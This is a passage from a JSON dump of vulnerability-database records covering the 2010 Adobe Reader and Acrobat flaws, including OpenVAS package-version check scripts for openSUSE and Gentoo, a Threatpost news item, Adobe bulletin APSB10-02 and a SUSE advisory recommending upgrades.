\"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\", \"CVE-2010-0012\", \"CVE-2009-4355\", \"CVE-2009-2624\", \"CVE-2010-0001\", \"CVE-2010-0097\", \"CVE-2009-4022\", \"CVE-2010-0290\", \"CVE-2010-0004\", \"CVE-2010-0005\");\n script_name(\"SuSE Update for acroread SUSE-SA:2010:008\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of acroread\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3~0.1\", rls:\"openSUSE11.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3~0.1.1\", rls:\"openSUSE11.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-15T11:57:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3953", "CVE-2009-3959", "CVE-2009-3955", "CVE-2009-4355", "CVE-2009-3957", "CVE-2009-3958", "CVE-2010-0001", "CVE-2009-4324", "CVE-2010-0290", "CVE-2009-3954", "CVE-2009-3956", "CVE-2010-0004", "CVE-2010-0097", "CVE-2010-0005", "CVE-2009-4022", "CVE-2009-2624", "CVE-2010-0012"], "description": "Check for the Version of acroread", "modified": "2017-12-15T00:00:00", "published": "2010-01-29T00:00:00", "id": "OPENVAS:850123", "href": "http://plugins.openvas.org/nasl.php?oid=850123", "type": "openvas", "title": "SuSE Update for acroread SUSE-SA:2010:008", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for acroread SUSE-SA:2010:008\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Specially crafted PDF files could crash acroread. Attackers could\n potentially exploit that to execute arbitrary code CVE-2009-3953,\n CVE-2009-3957,\n CVE-2009-4324.\n\n Acrobat reader was updated to version 9.3 to fix the security issues.\n\n Note: Due to integration issues with the major version update of\n acroread on SLE10 updates for SLE10 are not ready yet. Fixed\n packages will be submitted ASAP.\";\n\ntag_impact = \"remote code execution\";\ntag_affected = \"acroread on openSUSE 11.0, openSUSE 11.1, openSUSE 11.2\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850123);\n script_version(\"$Revision: 8130 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-15 07:31:09 +0100 (Fri, 15 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-29 14:09:25 +0100 (Fri, 29 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2010-008\");\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\", \"CVE-2010-0012\", \"CVE-2009-4355\", \"CVE-2009-2624\", \"CVE-2010-0001\", \"CVE-2010-0097\", \"CVE-2009-4022\", \"CVE-2010-0290\", \"CVE-2010-0004\", \"CVE-2010-0005\");\n script_name(\"SuSE Update for acroread SUSE-SA:2010:008\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of acroread\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3~0.1\", rls:\"openSUSE11.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3~0.1.1\", rls:\"openSUSE11.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-0196", "CVE-2010-2211", "CVE-2010-0192", "CVE-2010-2201", "CVE-2009-3953", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-0204", "CVE-2010-0190", "CVE-2010-2207", "CVE-2010-0186", "CVE-2010-0198", "CVE-2010-2203", "CVE-2010-0193", "CVE-2010-2210", "CVE-2009-4324", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-0188", "CVE-2010-2204", "CVE-2010-0194", "CVE-2010-1285", "CVE-2010-0191", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-0195", "CVE-2010-0201", "CVE-2010-0197", "CVE-2010-2208", "CVE-2010-2168", "CVE-2010-0203", "CVE-2010-1241", "CVE-2010-0199", "CVE-2010-0202"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201009-05.", "modified": "2019-03-14T00:00:00", "published": "2011-03-09T00:00:00", "id": "OPENVAS:136141256231069029", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231069029", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201009-05 (acroread)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201009_05.nasl 14171 2019-03-14 10:22:03Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.69029\");\n script_version(\"$Revision: 14171 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 11:22:03 +0100 (Thu, 14 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-09 05:54:11 +0100 (Wed, 09 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-4324\", \"CVE-2010-0186\", \"CVE-2010-0188\", \"CVE-2010-0190\", \"CVE-2010-0191\", \"CVE-2010-0192\", \"CVE-2010-0193\", \"CVE-2010-0194\", \"CVE-2010-0195\", \"CVE-2010-0196\", \"CVE-2010-0197\", \"CVE-2010-0198\", \"CVE-2010-0199\", \"CVE-2010-0201\", \"CVE-2010-0202\", \"CVE-2010-0203\", \"CVE-2010-0204\", \"CVE-2010-1241\", \"CVE-2010-1285\", \"CVE-2010-1295\", \"CVE-2010-1297\", \"CVE-2010-2168\", \"CVE-2010-2201\", \"CVE-2010-2202\", \"CVE-2010-2203\", \"CVE-2010-2204\", \"CVE-2010-2205\", \"CVE-2010-2206\", \"CVE-2010-2207\", \"CVE-2010-2208\", \"CVE-2010-2209\", \"CVE-2010-2210\", \"CVE-2010-2211\", \"CVE-2010-2212\");\n script_name(\"Gentoo Security Advisory GLSA 201009-05 (acroread)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities in Adobe Reader might result in the execution of\n arbitrary code or other attacks.\");\n script_tag(name:\"solution\", value:\"All Adobe Reader users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-text/acroread-9.3.4'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201009-05\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=297385\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=306429\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=313343\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=322857\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/advisories/apsa10-01.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-02.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-07.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-09.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-14.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-16.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201009-05.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-text/acroread\", unaffected: make_list(\"ge 9.3.4\"), vulnerable: make_list(\"lt 9.3.4\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-09-04T14:20:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-0196", "CVE-2010-2211", "CVE-2010-0192", "CVE-2010-2201", "CVE-2009-3953", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-0204", "CVE-2010-0190", "CVE-2010-2207", "CVE-2010-0186", "CVE-2010-0198", "CVE-2010-2203", "CVE-2010-0193", "CVE-2010-2210", "CVE-2009-4324", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-0188", "CVE-2010-2204", "CVE-2010-0194", "CVE-2010-1285", "CVE-2010-0191", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-0195", "CVE-2010-0201", "CVE-2010-0197", "CVE-2010-2208", "CVE-2010-2168", "CVE-2010-0203", "CVE-2010-1241", "CVE-2010-0199", "CVE-2010-0202"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201009-05.", "modified": "2017-08-30T00:00:00", "published": "2011-03-09T00:00:00", "id": "OPENVAS:69029", "href": "http://plugins.openvas.org/nasl.php?oid=69029", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201009-05 (acroread)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities in Adobe Reader might result in the execution of\n arbitrary code or other attacks.\";\ntag_solution = \"All Adobe Reader users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-text/acroread-9.3.4'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201009-05\nhttp://bugs.gentoo.org/show_bug.cgi?id=297385\nhttp://bugs.gentoo.org/show_bug.cgi?id=306429\nhttp://bugs.gentoo.org/show_bug.cgi?id=313343\nhttp://bugs.gentoo.org/show_bug.cgi?id=322857\nhttp://www.adobe.com/support/security/advisories/apsa10-01.html\nhttp://www.adobe.com/support/security/bulletins/apsb10-02.html\nhttp://www.adobe.com/support/security/bulletins/apsb10-07.html\nhttp://www.adobe.com/support/security/bulletins/apsb10-09.html\nhttp://www.adobe.com/support/security/bulletins/apsb10-14.html\nhttp://www.adobe.com/support/security/bulletins/apsb10-16.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201009-05.\";\n\n \n \n\nif(description)\n{\n script_id(69029);\n script_version(\"$Revision: 7024 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-30 13:51:43 +0200 (Wed, 30 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-09 05:54:11 +0100 (Wed, 09 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-4324\", \"CVE-2010-0186\", \"CVE-2010-0188\", \"CVE-2010-0190\", \"CVE-2010-0191\", \"CVE-2010-0192\", \"CVE-2010-0193\", \"CVE-2010-0194\", \"CVE-2010-0195\", \"CVE-2010-0196\", \"CVE-2010-0197\", \"CVE-2010-0198\", \"CVE-2010-0199\", \"CVE-2010-0201\", \"CVE-2010-0202\", \"CVE-2010-0203\", \"CVE-2010-0204\", \"CVE-2010-1241\", \"CVE-2010-1285\", \"CVE-2010-1295\", \"CVE-2010-1297\", \"CVE-2010-2168\", \"CVE-2010-2201\", \"CVE-2010-2202\", \"CVE-2010-2203\", \"CVE-2010-2204\", \"CVE-2010-2205\", \"CVE-2010-2206\", \"CVE-2010-2207\", \"CVE-2010-2208\", \"CVE-2010-2209\", \"CVE-2010-2210\", \"CVE-2010-2211\", \"CVE-2010-2212\");\n script_name(\"Gentoo Security Advisory GLSA 201009-05 (acroread)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-text/acroread\", unaffected: make_list(\"ge 9.3.4\"), vulnerable: make_list(\"lt 9.3.4\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T23:08:47", "bulletinFamily": "info", "cvelist": ["CVE-2009-3953", "CVE-2009-3954", "CVE-2009-3955", "CVE-2009-3956", "CVE-2009-3957", "CVE-2009-3958", "CVE-2009-3959", "CVE-2009-4324"], "description": "[](<https://threatpost.com/adobe-pdf-reader-gets-another-security-makeover-011310/>)Adobe has released a mega-update for its Reader and Acrobat software products to fix a total of eight documented security vulnerabilities. \n\nThe update comes with significant security improvements, including the on-by-default addition \u201cEnhanced Security,\u201d a feature that provides a set of default restrictions and a method to define trusted locations that should not be subject to those restrictions.\n\nFirst up, here are the security vulnerabilities patched with this update:\n\n * This update resolves a use-after-free vulnerability in Multimedia.api that could lead to code execution (CVE-2009-4324). There are reports that this issue is being actively exploited in the \nwild; the exploit targets Adobe Reader and Acrobat 9.2 on Windows \nplatforms.\n * This update resolves an array boundary issue in U3D support that could lead to code execution (CVE-2009-3953).** \n**\n * This update resolves a DLL-loading vulnerability in 3D that could allow arbitrary code execution (CVE-2009-3954).\n * This update resolves a memory corruption vulnerability that could lead to code execution (CVE-2009-3955).\n * This update mitigates a script injection vulnerability by changing the Enhanced Security default (CVE-2009-3956).\n * This update resolves a null-pointer dereference vulnerability that could lead to denial of service (CVE-2009-3957).\n * This update resolves a buffer overflow vulnerability in the Download Manager that could lead to code execution (CVE-2009-3958).\n * This update resolves an integer overflow vulnerability in U3D support that could lead to code execution (CVE-2009-3959).\n\nAdobe rates this a \u201ccritical\u201d update on all platforms. The flaws affect Adobe Reader 9.2 and Acrobat \n9.2 for Windows, Macintosh and UNIX; and Adobe Reader 8.1.7 and Acrobat \n8.1.7 for Windows and Macintosh. \n\nThese vulnerabilities could cause the \napplication to crash and could potentially allow an attacker to take \ncontrol of the affected system.\n\nAccording to [this document](<http://kb2.adobe.com/cps/520/cpsid_52073.html>) released alongside the patches, Adobe has turned on the Enhanced Security feature by default.\n\nEnhanced security provides two tools designed to help you protect your \nenvironment: a set of default restrictions and a method to define \ntrusted locations that should not be subject to those restrictions. In \nother words, you can either block dangerous actions altogether or else \nselectively permit them for locations and files you trust.\n\nIt also includes privileged location improvements, cross domain support, warning message and dialog improvements and the disabling of legacy multimedia support by default.\n\nAdobe is also beta testing a new automatic updater for Reader and Acrobat. By default, the updater will silently patch installations without user interaction.\n", "modified": "2018-08-15T13:43:45", "published": "2010-01-13T15:57:31", "id": "THREATPOST:FDD6058479E72E764E7F1190FFD3E2DA", "href": "https://threatpost.com/adobe-pdf-reader-gets-another-security-makeover-011310/73368/", "type": "threatpost", "title": "Adobe PDF Reader Gets Another Security Makeover", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:33", "bulletinFamily": "software", "cvelist": ["CVE-2009-3953", "CVE-2009-3959", "CVE-2009-3955", "CVE-2009-3957", "CVE-2009-3958", "CVE-2009-4324", "CVE-2009-3954", "CVE-2009-3956", "CVE-2009-2994"], "description": "Security updates available for Adobe Reader and Acrobat\r\n\r\nRelease date: January 12, 2010\r\n\r\nLast updated: January 15, 2010\r\n\r\nVulnerability identifier: APSB10-02\r\n\r\nCVE numbers: CVE-2009-3953, CVE-2009-3954, CVE-2009-3955, CVE-2009-3956, CVE-2009-3957, CVE-2009-3958, CVE-2009-3959, CVE-2009-4324\r\n\r\nPlatform: All\r\nSummary\r\n\r\nCritical vulnerabilities have been identified in Adobe Reader 9.2 and Acrobat 9.2 for Windows, Macintosh and UNIX, and Adobe Reader 8.1.7 and Acrobat 8.1.7 for Windows and Macintosh. These vulnerabilities could cause the application to crash and could potentially allow an attacker to take control of the affected system.\r\n\r\nAdobe recommends users of Adobe Reader 9.2 and Acrobat 9.2 and earlier versions for Windows, Macintosh and UNIX update to Adobe Reader 9.3 and Acrobat 9.3. Adobe recommends users of Acrobat 8.1.7 and earlier versions for Windows and Macintosh update to Acrobat 8.2. For Adobe Reader users on Windows and Macintosh who cannot update to Adobe Reader 9.3, Adobe has provided the Adobe Reader 8.2 update. Updates apply to all platforms: Windows, Macintosh and UNIX.\r\nAffected software versions\r\n\r\nAdobe Reader 9.2 and earlier versions for Windows, Macintosh, and UNIX\r\nAdobe Acrobat 9.2 and earlier versions for Windows and Macintosh\r\nSolution\r\n\r\nAdobe Reader\r\nAdobe Reader users on Windows, Macintosh and UNIX can find the appropriate update here:\r\nhttp://get.adobe.com/reader.\r\n\r\nAcrobat\r\nAcrobat Standard and Pro users on Windows can find the appropriate update here:\r\nhttp://www.adobe.com/support/downloads/product.jsp?product=1&platform=Windows.\r\n\r\nAcrobat Pro Extended users on Windows can find the appropriate update here: http://www.adobe.com/support/downloads/product.jsp?product=158&platform=Windows.\r\n\r\nAcrobat 3D users on Windows can find the appropriate update here:\r\nhttp://www.adobe.com/support/downloads/product.jsp?product=112&platform=Windows.\r\n\r\nAcrobat Pro users on Macintosh can find the appropriate update here:\r\nhttp://www.adobe.com/support/downloads/product.jsp?product=1&platform=Macintosh.\r\n\r\nNote: Support has ended for Adobe Reader 8.x on the UNIX platform, and Adobe Reader 7.x and Acrobat 7.x on Windows, Macintosh and UNIX platforms.\r\nSeverity rating\r\n\r\nAdobe categorizes this as a critical update and recommends that users apply the update for their product installations.\r\nDetails\r\n\r\nCritical vulnerabilities have been identified in Adobe Reader 9.2 and Acrobat 9.2 for Windows, Macintosh and UNIX, and Adobe Reader 8.1.7 and Acrobat 8.1.7 for Windows and Macintosh. These vulnerabilities could cause the application to crash and could potentially allow an attacker to take control of the affected system.\r\n\r\nAdobe recommends users of Adobe Reader 9.2 and Acrobat 9.2 and earlier versions for Windows, Macintosh and UNIX update to Adobe Reader 9.3 and Acrobat 9.3. Adobe recommends users of Acrobat 8.1.7 and earlier versions for Windows and Macintosh update to Acrobat 8.2. For Adobe Reader users on Windows and Macintosh who cannot update to Adobe Reader 9.3, Adobe has provided the Adobe Reader 8.2 update. Updates apply to all platforms: Windows, Macintosh and UNIX.\r\n\r\nThis update resolves a use-after-free vulnerability in Multimedia.api that could lead to code execution (CVE-2009-4324).\r\nNote: There are reports that this issue is being actively exploited in the wild; the exploit targets Adobe Reader and Acrobat 9.2 on Windows platforms.\r\n\r\nThis update resolves an array boundary issue in U3D support that could lead to code execution (CVE-2009-3953).\r\nNote: This issue had been incorrectly identified as a previously fixed vulnerability (CVE-2009-2994) in the Metasploit framework.\r\n\r\nThis update resolves a DLL-loading vulnerability in 3D that could allow arbitrary code execution (CVE-2009-3954).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2009-3955).\r\n\r\nThis update mitigates a script injection vulnerability by changing the Enhanced Security default (CVE-2009-3956).\r\n\r\nThis update resolves a null-pointer dereference vulnerability that could lead to denial of service (CVE-2009-3957).\r\n\r\nThis update resolves a buffer overflow vulnerability in the Download Manager that could lead to code execution (CVE-2009-3958).\r\n\r\nThis update resolves an integer overflow vulnerability in U3D support that could lead to code execution (CVE-2009-3959).\r\nAcknowledgements\r\n\r\nAdobe would like to thank the following individuals and organizations for reporting the relevant issues and for working with Adobe to help protect our customers:\r\n\r\n * Parvez Anwar via Secunia, and Felipe Andres Manzano a contributor with iSIGHT Partners Labs (CVE-2009-3953)\r\n * Greg MacManus of iSIGHT Partners Labs (CVE-2009-3954)\r\n * Code Audit Labs through iDefense's Vulnerability Contributor Program (CVE-2009-3955)\r\n * stratsec (CVE-2009-3956)\r\n * Didier Stevens (CVE-2009-3957)\r\n * Will Dormann of CERT (CVE-2009-3958)\r\n * Nicolas Joly of VUPEN Vulnerability Research Team (CVE-2009-3959)\r\n\r\nRevisions\r\n\r\nJanuary 15, 2010 - Bulletin's Acknowledgements section updated.\r\nJanuary 12, 2010 - Bulletin released.", "edition": 1, "modified": "2010-01-17T00:00:00", "published": "2010-01-17T00:00:00", "id": "SECURITYVULNS:DOC:23041", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23041", "title": "Security updates available for Adobe Reader and Acrobat", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:35", "bulletinFamily": "software", "cvelist": ["CVE-2009-3953", "CVE-2009-3959", "CVE-2009-3955", "CVE-2009-3957", "CVE-2009-3958", "CVE-2009-4324", "CVE-2010-0188", "CVE-2009-3954", "CVE-2009-3956"], "description": "Code executions, memory corruptions, buffer overflow, integer overflow, DoS on PDF parsing.", "edition": 1, "modified": "2010-03-15T00:00:00", "published": "2010-03-15T00:00:00", "id": "SECURITYVULNS:VULN:10516", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10516", "title": "Adobe Acrobat and Reader multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:21:59", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3953", "CVE-2009-3959", "CVE-2009-3955", "CVE-2009-4355", "CVE-2009-3957", "CVE-2009-3958", "CVE-2010-0001", "CVE-2009-4324", "CVE-2010-0290", "CVE-2009-3954", "CVE-2009-3956", "CVE-2010-0004", "CVE-2010-0097", "CVE-2010-0005", "CVE-2009-4022", "CVE-2009-2624", "CVE-2010-0012"], "description": "Specially crafted PDF files could crash acroread. Attackers could potentially exploit that to execute arbitrary code (CVE-2009-3953, CVE-2009-3954, CVE-2009-3955, CVE-2009-3956, CVE-2009-3957, CVE-2009-3958, CVE-2009-3959, CVE-2009-4324). Acrobat reader was updated to version 9.3 to fix the security issues. Note: Due to integration issues with the major version update of acroread on SLE10 updates for SLE10 are not ready yet. Fixed packages will be submitted ASAP.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2010-01-26T16:40:23", "published": "2010-01-26T16:40:23", "id": "SUSE-SA:2010:008", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-01/msg00009.html", "type": "suse", "title": "remote code execution in acroread", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:04", "bulletinFamily": "unix", "cvelist": ["CVE-2010-1295", "CVE-2010-0196", "CVE-2010-2211", "CVE-2010-0192", "CVE-2010-2201", "CVE-2009-3953", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-0204", "CVE-2010-0190", "CVE-2010-2207", "CVE-2010-0186", "CVE-2010-0198", "CVE-2010-2203", "CVE-2010-0193", 